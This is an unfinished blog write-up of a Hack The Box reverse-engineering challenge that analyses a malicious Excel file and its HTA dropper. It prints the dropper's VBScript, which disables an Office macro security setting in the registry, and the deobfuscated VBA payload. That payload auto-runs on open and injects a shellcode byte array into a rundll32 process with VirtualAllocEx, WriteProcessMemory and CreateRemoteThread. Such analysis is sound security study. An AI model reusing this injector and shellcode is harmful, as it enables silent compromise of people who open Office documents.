dev.lwlx.xyz

GitHub

Twitter

HTB write up for the oBfsC4t10n[HARD] challenge

security through obscurity?


lwlx

22. January 2021

@0x0000005

(WIP)

This is my Write Up for the "oBfsC4t10n" challenge from Hack The Box.

We are given a zip file. after extraction we are presented with an html file telling us to download an excel file. The excel file has been included in the html as a base64 encoded string, lets just save that info for later base64.txt in case we need it.

decoding base64.txt actually gives us a valid excel like file.

After we checked the HTML and deemed the download save lets fetch the excel file.

Enumeration

Instead of trying to open or analyze the file on our own machine, lets go ahead and upload it to ANY.RUN.

https://ANY.RUN is a online Sandbox service that allows you to open various suspicious files or programms to fully analyze what would happen, without the danger.

After Testing the file with ANY.RUN we were able to see how the exploit would work and what would be done. So we tested on a Windows 7 Machine, after opening the file, the exploit imediately startet to run:

excel-file-report

  1. At first a temp file was created under C:\Users\admin\AppData\Local\Temp\CVR40EB.tmp.cvr
  2. Then a what seems to be visual basic script executer was added here: C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd
  3. followed by a .hta file with a funny name..: C:\Users\admin\AppData\Local\Temp\LwTHLrGh.hta <-- lemme guess thats the one.
  4. it then makes use of mshta.exe to try and execute the LwTHLrGh.hta file.
  5. then ANY.RUN stops executing the file.

important files

I went ahead and downloaded the MSForms.exd as well as the LwTHLrGh.hta file so we can analyze them further.

Analyzing LwTHLrGh.hta

.hta is a propriatary file format used by microsoft, its called 'HTML Application' and supports HTML code as well as Visual Basic or JScript. This format was meant to be used by Internet Explorer.

The default file-association for the .hta extension is the Microsoft HTML Application Host (mshta.exe). If you have not disabled or changed this file association, in effect the HTA file behaves like an executable when double-clicked. An HTA runs as a fully trusted application and as a result has a lot more privileges than a normal HTML file.

Sounds dangerous, nice!

So lets disect this bitch!

When opening the file we see it has a rather clear structure, a huge VB Script and even comments. How nice of the hacker not to obfuscate his code too much, thanks @0xdf. ;-)

1"<html><head>
2
3<script language="vbscript">
4
5<!-- VB script here -->
6
7</script></head></html>"

so naturally, since its practiacally all the code, we strip the vbcode out of the .hta to make it readable.

Thank god we know VB, otherwise this would be a pain from here on now. ;-) Thankfully, since the autor has left some comments, indicating how the attack works, we should be able to cope with it.

The very first thing he does is effectively creating a backup of the AccessVBOM key if it has been set before.

1' Get the old AccessVBOM value
2RegPath = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & objExcel.Version & "\Excel\Security\AccessVBOM"
3
4if RegExists(RegPath) then
5        action = WshShell.RegRead(RegPath)
6else
7        action = """"
8end if

"Setting AccessVBOM to 1 allows to access the VBA Object Model"

Then he 'weakens the target' by setting the AccessVBOM to 1, thus enabling all acces to VBA Object Model.

1' Weaken the target
2WshShell.RegWrite RegPath, 1, "REG_DWORD"

Then he gets to the juicy part. To Exploit the Security setting he just turned off, he creates a new Excel Workboo, with macros of course. He then proceeds to add VBComponents to the Excel, allowing him to add an Assembly Code Module.

1' Run the macro
2Set objWorkbook = objExcel.Workbooks.Add()
3Set xlmodule = objWorkbook.VBProject.VBComponents.Add(1)
4xlmodule.CodeModule.AddFromString ... 80 more lines...
5

In his last step this good boy restores the systems registry to its previous state.

1' Restore the registry to its old state
2if action = "" then
3        WshShell.RegDelete RegPath
4else
5        WshShell.RegWrite RegPath, action, "REG_DWORD"
6end if
7self.close

xlmodule.CodeModule.AddFromString contains many obfuscated lines of assembly code, I deobfuscated it by printing it via VBS.

Here is the actualy assembly code payload:

1Private Type PROCESS_INFORMATION
2    hProcess As Long
3    hThread As Long
4    dwProcessId As Long
5    dwThreadId As Long
6End Type
7
8Private Type STARTUPINFO
9    cb As Long
10    lpReserved As String
11    lpDesktop As String
12    lpTitle As String
13    dwX As Long
14    dwY As Long
15    dwXSize As Long
16    dwYSize As Long
17    dwXCountChars As Long
18    dwYCountChars As Long
19    dwFillAttribute As Long
20    dwFlags As Long
21    wShowWindow As Integer
22    cbReserved2 As Integer
23    lpReserved2 As Long
24    hStdInput As Long
25    hStdOutput As Long
26    hStdError As Long
27End Type
28
29#If VBA7 Then
30    Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr
31    Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
32    Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr
33    Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
34#Else
35    Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long
36    Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
37    Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long
38    Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
39#End If
40
41Sub Auto_Open()
42    Dim myByte As Long, myArray As Variant, offset As Long
43    Dim pInfo As PROCESS_INFORMATION
44    Dim sInfo As STARTUPINFO
45    Dim sNull As String
46    Dim sProc As String
47
48#If VBA7 Then
49    Dim rwxpage As LongPtr, res As LongPtr
50#Else
51    Dim rwxpage As Long, res As Long
52#End If
53    myArray = Array(-35,-63,-65,32,86,66,126,-39,116,36,-12,91,49,-55,-79,98,49,123,24,3,123,24,-125,-61,36,-76,-73,-126,-52,-70,56,123,12,-37,-79,-98,61,-37,-90,-21,109,-21,-83,-66,-127,-128,-32,42,18,-28,44,92,-109,67,11,83,36,-1,111,-14,-90,2,-68,-44,-105,-52,-79,21,-48,49,59,71,-119,62,-18,120,-66,11,51,-14,-116,-102,51,-25,68,-100,18,-74,-33,-57,-76,56,12,124,-3,34,81,-71,-73,-39,-95,53,70,8,-8,-74,-27,117,53,69,-9,-78,-15,-74,-126,-54,2,74,-107,8,121,-112,16,-117,-39,83,-126,119,-40,-80,85,-13,-42,125,17,91,-6,-128,-10,-41,6,8,-7,55,-113,74,-34,-109,-44,9,127,-123,-80,-4,-128,-43,27,-96,36,-99,-79,-75,84,-4,-35,122,85,-1,29,21,-18,-116,47,-70,68,27,3,51,67,-36,100,110,51,114,-101,-111,68,90,95,-59,20,-12,118,102,-1,4,119,-77,80,85,-41,108,17,5,-105,-36,-7,79,24,2,25,112,-13,43,50,-88,-5,83,-61,-46,-115,58,-81,49,21,-46,66,43,-68,66,-77,-59,81,-76,-125,77,-17,-79,116,94,-80,2,72,-22,17,-7,-58,33,-14,113,127,119,127,26,76,37,2,-38,-38,96,-44,-18,-102,-116,-15,-124,-37,110,-109,-112,-117,-26,97,-91,42,76,-20,67,70,-94,-72,-36,-1,91,-31,-105,-98,-92,60,-46,-95,47,-76,34,111,-40,-67,48,-104,-65,61,-55,89,42,61,-93,93,-4,106,91,92,-39,92,-60,-97,12,-33,3,95,-47,-23,120,86,71,85,23,-105,-121,85,-25,-63,-51,85,-113,-75,-75,6,-86,-71,99,59,103,44,-116,109,-37,-25,-28,-109,2,-49,-86,108,97,83,-84,-110,-9,124,21,-6,7,61,-91,-6,109,-67,-11,-110,122,-110,-6,82,-126,57,83,-6,9,-84,17,-101,14,-27,-12,5,14,10,45,-74,117,95,-46,55,-118,-119,-73,56,-118,-75,-55,5,92,-116,-65,72,92,-85,-80,-1,-63,-102,90,-1,86,-36,78)
54    If Len(Environ("ProgramW6432")) > 0 Then
55        sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe"
56    Else
57        sProc = Environ("windir") & "\\System32\\rundll32.exe"
58    End If
59
60    res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)
61
62    rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)
63    For offset = LBound(myArray) To UBound(myArray)
64        myByte = myArray(offset)
65        res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)
66    Next offset
67    res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)
68End Sub
69Sub AutoOpen()
70    Auto_Open
71End Sub
72Sub Workbook_Open()
73    Auto_Open
74End Sub

You can see the Variable myArray seems suspicous, when running the payload in Excel I get an error for 'myArray'

Im stuck here at the moment... I was told i would not need windows..

@ me on twitter @0x0000005

This Post is marked as WIP and will be updated continously.

© lwlx. 2021

Version 0.6.1